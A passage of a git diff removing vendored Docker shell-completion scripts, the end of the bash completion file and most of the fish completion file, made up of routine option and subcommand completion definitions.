network) - __docker_complete_networks --cur "${cur##*=}" - return - ;; - type) - COMPREPLY=( $( compgen -W "container daemon image network volume" -- "${cur##*=}" ) ) - return - ;; - volume) - __docker_complete_volumes --cur "${cur##*=}" - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -S = -W "container daemon event image label network type volume" -- "$cur" ) ) - __docker_nospace - return - ;; - --since|--until) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--filter -f --help --since --until --format" -- "$cur" ) ) - ;; - esac -} - -_docker_system_info() { - case "$prev" in - --format|-f) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) - ;; - esac -} - -_docker_system_prune() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--all -a --force -f --help" -- "$cur" ) ) - ;; - esac -} - - -_docker_tag() { - _docker_image_tag -} - -_docker_unpause() { - _docker_container_unpause -} - -_docker_update() { - _docker_container_update -} - -_docker_top() { - _docker_container_top -} - -_docker_version() { - case "$prev" in - --format|-f) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) - ;; - esac -} - -_docker_volume_create() { - case "$prev" in - --driver|-d) - __docker_complete_plugins_bundled --type Volume - return - ;; - --label|--opt|-o) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--driver -d --help --label --opt -o" -- "$cur" ) ) - ;; - esac -} - -_docker_volume_inspect() { - case "$prev" in - --format|-f) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) - ;; - *) - __docker_complete_volumes - ;; - esac -} - -_docker_volume_ls() { - local key=$(__docker_map_key_of_current_option '--filter|-f') - case "$key" in - dangling) - COMPREPLY=( $( compgen -W "true false" -- "${cur##*=}" ) ) - return - ;; - driver) - __docker_complete_plugins_bundled --cur "${cur##*=}" --type Volume - return - ;; - name) - __docker_complete_volumes --cur "${cur##*=}" - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -S = -W "dangling driver label name" -- "$cur" ) ) - __docker_nospace - return - ;; - --format) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--filter -f --format --help --quiet -q" -- "$cur" ) ) - ;; - esac -} - -_docker_volume_prune() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) - ;; - esac -} - -_docker_volume_rm() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) - ;; - *) - __docker_complete_volumes - ;; - esac -} - -_docker_volume() { - local subcommands=" - create - inspect - ls - prune - rm - " - __docker_subcommands "$subcommands" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - -_docker_wait() { - _docker_container_wait -} - -_docker() { - local previous_extglob_setting=$(shopt -p extglob) - shopt -s extglob - - local management_commands=( - container - image - network - node - plugin - secret - service - stack - system - volume - ) - - local top_level_commands=( - build - login - logout - run - search - version - ) - - local legacy_commands=( - commit - cp - create - diff - events - exec - export - history - images - import - info - inspect - kill - load - logs - pause - port - ps - pull - push - rename - restart - rm - rmi - save - start - stats - stop - swarm - tag - top - unpause - update - wait - ) - - local experimental_commands=( - checkpoint - deploy - ) - - local commands=(${management_commands[*]} ${top_level_commands[*]}) - [ -z "$DOCKER_HIDE_LEGACY_COMMANDS" ] && commands+=(${legacy_commands[*]}) - - # These options are valid as global options for all client commands - # and valid as command options for `docker daemon` - local global_boolean_options=" - --debug -D - --tls - --tlsverify - " - local global_options_with_args=" - --config - --host -H - --log-level -l - --tlscacert - --tlscert - --tlskey - " - - local host config - - COMPREPLY=() - local cur prev words cword - _get_comp_words_by_ref -n : cur prev words cword - - local command='docker' command_pos=0 subcommand_pos - local counter=1 - while [ $counter -lt $cword ]; do - case "${words[$counter]}" in - # save host so that completion can use custom daemon - --host|-H) - (( counter++ )) - host="${words[$counter]}" - ;; - # save config so that completion can use custom configuration directories - --config) - (( counter++ )) - config="${words[$counter]}" - ;; - $(__docker_to_extglob "$global_options_with_args") ) - (( counter++ )) - ;; - -*) - ;; - =) - (( counter++ )) - ;; - *) - command="${words[$counter]}" - command_pos=$counter - break - ;; - esac - (( counter++ )) - done - - local binary="${words[0]}" - if [[ $binary == ?(*/)dockerd ]] ; then - # for the dockerd binary, we reuse completion of `docker daemon`. - # dockerd does not have subcommands and global options. - command=daemon - command_pos=0 - fi - - local completions_func=_docker_${command} - declare -F $completions_func >/dev/null && $completions_func - - eval "$previous_extglob_setting" - return 0 -} - -eval "$__docker_previous_extglob_setting" -unset __docker_previous_extglob_setting - -complete -F _docker docker dockerd diff --git a/vendor/github.com/docker/docker/contrib/completion/fish/docker.fish b/vendor/github.com/docker/docker/contrib/completion/fish/docker.fish deleted file mode 100644 index 2715cb1aa6..0000000000 --- a/vendor/github.com/docker/docker/contrib/completion/fish/docker.fish +++ /dev/null @@ -1,405 +0,0 @@ -# docker.fish - docker completions for fish shell -# -# This file is generated by gen_docker_fish_completions.py from: -# https://github.com/barnybug/docker-fish-completion -# -# To install the completions: -# mkdir -p ~/.config/fish/completions -# cp docker.fish ~/.config/fish/completions -# -# Completion supported: -# - parameters -# - commands -# - containers -# - images -# - repositories - -function __fish_docker_no_subcommand --description 'Test if docker has yet to be given the subcommand' - for i in (commandline -opc) - if contains -- $i attach build commit cp create diff events exec export history images import info inspect kill load login logout logs pause port ps pull push rename restart rm rmi run save search start stop tag top unpause version wait stats - return 1 - end - end - return 0 -end - -function __fish_print_docker_containers --description 'Print a list of docker containers' -a select - switch $select - case running - docker ps -a --no-trunc | command awk 'NR>1' | command awk 'BEGIN {FS=" +"}; $5 ~ "^Up" {print $1 "\n" $(NF)}' | tr ',' '\n' - case stopped - docker ps -a --no-trunc | command awk 'NR>1' | command awk 'BEGIN {FS=" +"}; $5 ~ "^Exit" {print $1 "\n" $(NF)}' | tr ',' '\n' - case all - docker ps -a --no-trunc | command awk 'NR>1' | command awk 'BEGIN {FS=" +"}; {print $1 "\n" $(NF)}' | tr ',' '\n' - end -end - -function __fish_print_docker_images --description 'Print a list of docker images' - docker images | command awk 'NR>1' | command grep -v '' | command awk '{print $1":"$2}' -end - -function __fish_print_docker_repositories --description 'Print a list of docker repositories' - docker images | command awk 'NR>1' | command grep -v '' | command awk '{print $1}' | command sort | command uniq -end - -# common options -complete -c docker -f -n '__fish_docker_no_subcommand' -l api-cors-header -d "Set CORS headers in the Engine API. Default is cors disabled" -complete -c docker -f -n '__fish_docker_no_subcommand' -s b -l bridge -d 'Attach containers to a pre-existing network bridge' -complete -c docker -f -n '__fish_docker_no_subcommand' -l bip -d "Use this CIDR notation address for the network bridge's IP, not compatible with -b" -complete -c docker -f -n '__fish_docker_no_subcommand' -s D -l debug -d 'Enable debug mode' -complete -c docker -f -n '__fish_docker_no_subcommand' -s d -l daemon -d 'Enable daemon mode' -complete -c docker -f -n '__fish_docker_no_subcommand' -l dns -d 'Force Docker to use specific DNS servers' -complete -c docker -f -n '__fish_docker_no_subcommand' -l dns-opt -d 'Force Docker to use specific DNS options' -complete -c docker -f -n '__fish_docker_no_subcommand' -l dns-search -d 'Force Docker to use specific DNS search domains' -complete -c docker -f -n '__fish_docker_no_subcommand' -l exec-opt -d 'Set runtime execution options' -complete -c docker -f -n '__fish_docker_no_subcommand' -l fixed-cidr -d 'IPv4 subnet for fixed IPs (e.g. 10.20.0.0/16)' -complete -c docker -f -n '__fish_docker_no_subcommand' -l fixed-cidr-v6 -d 'IPv6 subnet for fixed IPs (e.g.: 2001:a02b/48)' -complete -c docker -f -n '__fish_docker_no_subcommand' -s G -l group -d 'Group to assign the unix socket specified by -H when running in daemon mode' -complete -c docker -f -n '__fish_docker_no_subcommand' -s g -l graph -d 'Path to use as the root of the Docker runtime' -complete -c docker -f -n '__fish_docker_no_subcommand' -s H -l host -d 'The socket(s) to bind to in daemon mode or connect to in client mode, specified using one or more tcp://host:port, unix:///path/to/socket, fd://* or fd://socketfd.' -complete -c docker -f -n '__fish_docker_no_subcommand' -s h -l help -d 'Print usage' -complete -c docker -f -n '__fish_docker_no_subcommand' -l icc -d 'Allow unrestricted inter-container and Docker daemon host communication' -complete -c docker -f -n '__fish_docker_no_subcommand' -l insecure-registry -d 'Enable insecure communication with specified registries (no certificate verification for HTTPS and enable HTTP fallback) (e.g., localhost:5000 or 10.20.0.0/16)' -complete -c docker -f -n '__fish_docker_no_subcommand' -l ip -d 'Default IP address to use when binding container ports' -complete -c docker -f -n '__fish_docker_no_subcommand' -l ip-forward -d 'Enable net.ipv4.ip_forward and IPv6 forwarding if --fixed-cidr-v6 is defined. IPv6 forwarding may interfere with your existing IPv6 configuration when using Router Advertisement.' -complete -c docker -f -n '__fish_docker_no_subcommand' -l ip-masq -d "Enable IP masquerading for bridge's IP range" -complete -c docker -f -n '__fish_docker_no_subcommand' -l iptables -d "Enable Docker's addition of iptables rules" -complete -c docker -f -n '__fish_docker_no_subcommand' -l ipv6 -d 'Enable IPv6 networking' -complete -c docker -f -n '__fish_docker_no_subcommand' -s l -l log-level -d 'Set the logging level ("debug", "info", "warn", "error", "fatal")' -complete -c docker -f -n '__fish_docker_no_subcommand' -l label -d 'Set key=value labels to the daemon (displayed in `docker info`)' -complete -c docker -f -n '__fish_docker_no_subcommand' -l mtu -d 'Set the containers network MTU' -complete -c docker -f -n '__fish_docker_no_subcommand' -s p -l pidfile -d 'Path to use for daemon PID file' -complete -c docker -f -n '__fish_docker_no_subcommand' -l registry-mirror -d 'Specify a preferred Docker registry mirror' -complete -c docker -f -n '__fish_docker_no_subcommand' -s s -l storage-driver -d 'Force the Docker runtime to use a specific storage driver' -complete -c docker -f -n '__fish_docker_no_subcommand' -l selinux-enabled -d 'Enable selinux support. SELinux does not presently support the BTRFS storage driver' -complete -c docker -f -n '__fish_docker_no_subcommand' -l storage-opt -d 'Set storage driver options' -complete -c docker -f -n '__fish_docker_no_subcommand' -l tls -d 'Use TLS; implied by --tlsverify' -complete -c docker -f -n '__fish_docker_no_subcommand' -l tlscacert -d 'Trust only remotes providing a certificate signed by the CA given here' -complete -c docker -f -n '__fish_docker_no_subcommand' -l tlscert -d 'Path to TLS certificate file' -complete -c docker -f -n '__fish_docker_no_subcommand' -l tlskey -d 'Path to TLS key file' -complete -c docker -f -n '__fish_docker_no_subcommand' -l tlsverify -d 'Use TLS and verify the remote (daemon: verify client, client: verify daemon)' -complete -c docker -f -n '__fish_docker_no_subcommand' -s v -l version -d 'Print version information and quit' - -# subcommands -# attach -complete -c docker -f -n '__fish_docker_no_subcommand' -a attach -d 'Attach to a running container' -complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -l no-stdin -d 'Do not attach STDIN' -complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -l sig-proxy -d 'Proxy all received signals to the process (non-TTY mode only). SIGCHLD, SIGKILL, and SIGSTOP are not proxied.' -complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -a '(__fish_print_docker_containers running)' -d "Container" - -# build -complete -c docker -f -n '__fish_docker_no_subcommand' -a build -d 'Build an image from a Dockerfile' -complete -c docker -A -f -n '__fish_seen_subcommand_from build' -s f -l file -d "Name of the Dockerfile(Default is 'Dockerfile' at context root)" -complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l force-rm -d 'Always remove intermediate containers, even after unsuccessful builds' -complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l no-cache -d 'Do not use cache when building the image' -complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l pull -d 'Always attempt to pull a newer version of the image' -complete -c docker -A -f -n '__fish_seen_subcommand_from build' -s q -l quiet -d 'Suppress the build output and print image ID on success' -complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l rm -d 'Remove intermediate containers after a successful build' -complete -c docker -A -f -n '__fish_seen_subcommand_from build' -s t -l tag -d 'Repository name (and optionally a tag) to be applied to the resulting image in case of success' - -# commit -complete -c docker -f -n '__fish_docker_no_subcommand' -a commit -d "Create a new image from a container's changes" -complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -s a -l author -d 'Author (e.g., "John Hannibal Smith ")' -complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -s m -l message -d 'Commit message' -complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -s p -l pause -d 'Pause container during commit' -complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -a '(__fish_print_docker_containers all)' -d "Container" - -# cp -complete -c docker -f -n '__fish_docker_no_subcommand' -a cp -d "Copy files/folders between a container and the local filesystem" -complete -c docker -A -f -n '__fish_seen_subcommand_from cp' -l help -d 'Print usage' - -# create -complete -c docker -f -n '__fish_docker_no_subcommand' -a create -d 'Create a new container' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s a -l attach -d 'Attach to STDIN, STDOUT or STDERR.' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l add-host -d 'Add a custom host-to-IP mapping (host:ip)' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cpu-shares -d 'CPU shares (relative weight)' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cap-add -d 'Add Linux capabilities' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cap-drop -d 'Drop Linux capabilities' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cidfile -d 'Write the container ID to the file' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cpuset -d 'CPUs in which to allow execution (0-3, 0,1)' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l device -d 'Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm)' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l dns -d 'Set custom DNS servers' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l dns-opt -d "Set custom DNS options (Use --dns-opt='' if you don't wish to set options)" -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l dns-search -d "Set custom DNS search domains (Use --dns-search=. if you don't wish to set the search domain)" -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s e -l env -d 'Set environment variables' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l entrypoint -d 'Overwrite the default ENTRYPOINT of the image' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l env-file -d 'Read in a line delimited file of environment variables' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l expose -d 'Expose a port or a range of ports (e.g. --expose=3300-3310) from the container without publishing it to your host' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l group-add -d 'Add additional groups to run as' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s h -l hostname -d 'Container host name' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s i -l interactive -d 'Keep STDIN open even if not attached' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l ipc -d 'Default is to create a private IPC namespace (POSIX SysV IPC) for the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l link -d 'Add link to another container in the form of :alias' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s m -l memory -d 'Memory limit (format: [], where unit = b, k, m or g)' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l mac-address -d 'Container MAC address (e.g. 92:d0:c6:0a:29:33)' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l memory-swap -d "Total memory usage (memory + swap), set '-1' to disable swap (format: [], where unit = b, k, m or g)" -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l name -d 'Assign a name to the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l net -d 'Set the Network mode for the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s P -l publish-all -d 'Publish all exposed ports to random ports on the host interfaces' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s p -l publish -d "Publish a container's port to the host" -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l pid -d 'Default is to create a private PID namespace for the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l privileged -d 'Give extended privileges to this container' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l read-only -d "Mount the container's root filesystem as read only" -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l restart -d 'Restart policy to apply when a container exits (no, on-failure[:max-retry], always)' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l security-opt -d 'Security Options' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s t -l tty -d 'Allocate a pseudo-TTY' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s u -l user -d 'Username or UID' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s v -l volume -d 'Bind mount a volume (e.g., from the host: -v /host:/container, from Docker: -v /container)' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l volumes-from -d 'Mount volumes from the specified container(s)' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s w -l workdir -d 'Working directory inside the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -a '(__fish_print_docker_images)' -d "Image" - -# diff -complete -c docker -f -n '__fish_docker_no_subcommand' -a diff -d "Inspect changes on a container's filesystem" -complete -c docker -A -f -n '__fish_seen_subcommand_from diff' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from diff' -a '(__fish_print_docker_containers all)' -d "Container" - -# events -complete -c docker -f -n '__fish_docker_no_subcommand' -a events -d 'Get real time events from the server' -complete -c docker -A -f -n '__fish_seen_subcommand_from events' -s f -l filter -d "Provide filter values (i.e., 'event=stop')" -complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l since -d 'Show all events created since timestamp' -complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l until -d 'Stream events until this timestamp' -complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l format -d 'Format the output using the given go template' - -# exec -complete -c docker -f -n '__fish_docker_no_subcommand' -a exec -d 'Run a command in a running container' -complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -s d -l detach -d 'Detached mode: run command in the background' -complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -s i -l interactive -d 'Keep STDIN open even if not attached' -complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -s t -l tty -d 'Allocate a pseudo-TTY' -complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -a '(__fish_print_docker_containers running)' -d "Container" - -# export -complete -c docker -f -n '__fish_docker_no_subcommand' -a export -d 'Stream the contents of a container as a tar archive' -complete -c docker -A -f -n '__fish_seen_subcommand_from export' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from export' -a '(__fish_print_docker_containers all)' -d "Container" - -# history -complete -c docker -f -n '__fish_docker_no_subcommand' -a history -d 'Show the history of an image' -complete -c docker -A -f -n '__fish_seen_subcommand_from history' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from history' -l no-trunc -d "Don't truncate output" -complete -c docker -A -f -n '__fish_seen_subcommand_from history' -s q -l quiet -d 'Only show numeric IDs' -complete -c docker -A -f -n '__fish_seen_subcommand_from history' -a '(__fish_print_docker_images)' -d "Image" - -# images -complete -c docker -f -n '__fish_docker_no_subcommand' -a images -d 'List images' -complete -c docker -A -f -n '__fish_seen_subcommand_from images' -s a -l all -d 'Show all images (by default filter out the intermediate image layers)' -complete -c docker -A -f -n '__fish_seen_subcommand_from images' -s f -l filter -d "Provide filter values (i.e., 'dangling=true')" -complete -c docker -A -f -n '__fish_seen_subcommand_from images' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from images' -l no-trunc -d "Don't truncate output" -complete -c docker -A -f -n '__fish_seen_subcommand_from images' -s q -l quiet -d 'Only show numeric IDs' -complete -c docker -A -f -n '__fish_seen_subcommand_from images' -a '(__fish_print_docker_repositories)' -d "Repository" - -# import -complete -c docker -f -n '__fish_docker_no_subcommand' -a import -d 'Create a new filesystem image from the contents of a tarball' -complete -c docker -A -f -n '__fish_seen_subcommand_from import' -l help -d 'Print usage' - -# info -complete -c docker -f -n '__fish_docker_no_subcommand' -a info -d 'Display system-wide information' -complete -c docker -A -f -n '__fish_seen_subcommand_from info' -s f -l format -d 'Format the output using the given go template' -complete -c docker -A -f -n '__fish_seen_subcommand_from info' -l help -d 'Print usage' - -# inspect -complete -c docker -f -n '__fish_docker_no_subcommand' -a inspect -d 'Return low-level information on a container or image' -complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -s f -l format -d 'Format the output using the given go template.' -complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -s s -l size -d 'Display total file sizes if the type is container.' -complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -a '(__fish_print_docker_images)' -d "Image" -complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -a '(__fish_print_docker_containers all)' -d "Container" - -# kill -complete -c docker -f -n '__fish_docker_no_subcommand' -a kill -d 'Kill a running container' -complete -c docker -A -f -n '__fish_seen_subcommand_from kill' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from kill' -s s -l signal -d 'Signal to send to the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from kill' -a '(__fish_print_docker_containers running)' -d "Container" - -# load -complete -c docker -f -n '__fish_docker_no_subcommand' -a load -d 'Load an image from a tar archive' -complete -c docker -A -f -n '__fish_seen_subcommand_from load' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from load' -s i -l input -d 'Read from a tar archive file, instead of STDIN' - -# login -complete -c docker -f -n '__fish_docker_no_subcommand' -a login -d 'Log in to a Docker registry server' -complete -c docker -A -f -n '__fish_seen_subcommand_from login' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from login' -s p -l password -d 'Password' -complete -c docker -A -f -n '__fish_seen_subcommand_from login' -s u -l username -d 'Username' - -# logout -complete -c docker -f -n '__fish_docker_no_subcommand' -a logout -d 'Log out from a Docker registry server' - -# logs -complete -c docker -f -n '__fish_docker_no_subcommand' -a logs -d 'Fetch the logs of a container' -complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -s f -l follow -d 'Follow log output' -complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -s t -l timestamps -d 'Show timestamps' -complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -l since -d 'Show logs since timestamp' -complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -l tail -d 'Output the specified number of lines at the end of logs (defaults to all logs)' -complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -a '(__fish_print_docker_containers running)' -d "Container" - -# port -complete -c docker -f -n '__fish_docker_no_subcommand' -a port -d 'Lookup the public-facing port that is NAT-ed to PRIVATE_PORT' -complete -c docker -A -f -n '__fish_seen_subcommand_from port' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from port' -a '(__fish_print_docker_containers running)' -d "Container" - -# pause -complete -c docker -f -n '__fish_docker_no_subcommand' -a pause -d 'Pause all processes within a container' -complete -c docker -A -f -n '__fish_seen_subcommand_from pause' -a '(__fish_print_docker_containers running)' -d "Container" - -# ps -complete -c docker -f -n '__fish_docker_no_subcommand' -a ps -d 'List containers' -complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s a -l all -d 'Show all containers. Only running containers are shown by default.' -complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l before -d 'Show only container created before Id or Name, include non-running ones.' -complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s f -l filter -d 'Provide filter values. Valid filters:' -complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s l -l latest -d 'Show only the latest created container, include non-running ones.' -complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s n -d 'Show n last created containers, include non-running ones.' -complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l no-trunc -d "Don't truncate output" -complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s q -l quiet -d 'Only display numeric IDs' -complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s s -l size -d 'Display total file sizes' -complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l since -d 'Show only containers created since Id or Name, include non-running ones.' - -# pull -complete -c docker -f -n '__fish_docker_no_subcommand' -a pull -d 'Pull an image or a repository from a Docker registry server' -complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -s a -l all-tags -d 'Download all tagged images in the repository' -complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -a '(__fish_print_docker_images)' -d "Image" -complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -a '(__fish_print_docker_repositories)' -d "Repository" - -# push -complete -c docker -f -n '__fish_docker_no_subcommand' -a push -d 'Push an image or a repository to a Docker registry server' -complete -c docker -A -f -n '__fish_seen_subcommand_from push' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from push' -a '(__fish_print_docker_images)' -d "Image" -complete -c docker -A -f -n '__fish_seen_subcommand_from push' -a '(__fish_print_docker_repositories)' -d "Repository" - -# rename -complete -c docker -f -n '__fish_docker_no_subcommand' -a rename -d 'Rename an existing container' - -# restart -complete -c docker -f -n '__fish_docker_no_subcommand' -a restart -d 'Restart a container' -complete -c docker -A -f -n '__fish_seen_subcommand_from restart' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from restart' -s t -l time -d 'Number of seconds to try to stop for before killing the container. Once killed it will then be restarted. Default is 10 seconds.' -complete -c docker -A -f -n '__fish_seen_subcommand_from restart' -a '(__fish_print_docker_containers running)' -d "Container" - -# rm -complete -c docker -f -n '__fish_docker_no_subcommand' -a rm -d 'Remove one or more containers' -complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s f -l force -d 'Force the removal of a running container (uses SIGKILL)' -complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s l -l link -d 'Remove the specified link and not the underlying container' -complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s v -l volumes -d 'Remove the volumes associated with the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -a '(__fish_print_docker_containers stopped)' -d "Container" -complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s f -l force -a '(__fish_print_docker_containers all)' -d "Container" - -# rmi -complete -c docker -f -n '__fish_docker_no_subcommand' -a rmi -d 'Remove one or more images' -complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -s f -l force -d 'Force removal of the image' -complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -l no-prune -d 'Do not delete untagged parents' -complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -a '(__fish_print_docker_images)' -d "Image" - -# run -complete -c docker -f -n '__fish_docker_no_subcommand' -a run -d 'Run a command in a new container' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s a -l attach -d 'Attach to STDIN, STDOUT or STDERR.' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l add-host -d 'Add a custom host-to-IP mapping (host:ip)' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s c -l cpu-shares -d 'CPU shares (relative weight)' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cap-add -d 'Add Linux capabilities' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cap-drop -d 'Drop Linux capabilities' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cidfile -d 'Write the container ID to the file' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cpuset -d 'CPUs in which to allow execution (0-3, 0,1)' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s d -l detach -d 'Detached mode: run the container in the background and print the new container ID' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l device -d 'Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm)' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l dns -d 'Set custom DNS servers' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l dns-opt -d "Set custom DNS options (Use --dns-opt='' if you don't wish to set options)" -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l dns-search -d "Set custom DNS search domains (Use --dns-search=. if you don't wish to set the search domain)" -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s e -l env -d 'Set environment variables' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l entrypoint -d 'Overwrite the default ENTRYPOINT of the image' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l env-file -d 'Read in a line delimited file of environment variables' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l expose -d 'Expose a port or a range of ports (e.g. --expose=3300-3310) from the container without publishing it to your host' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l group-add -d 'Add additional groups to run as' -complete -c 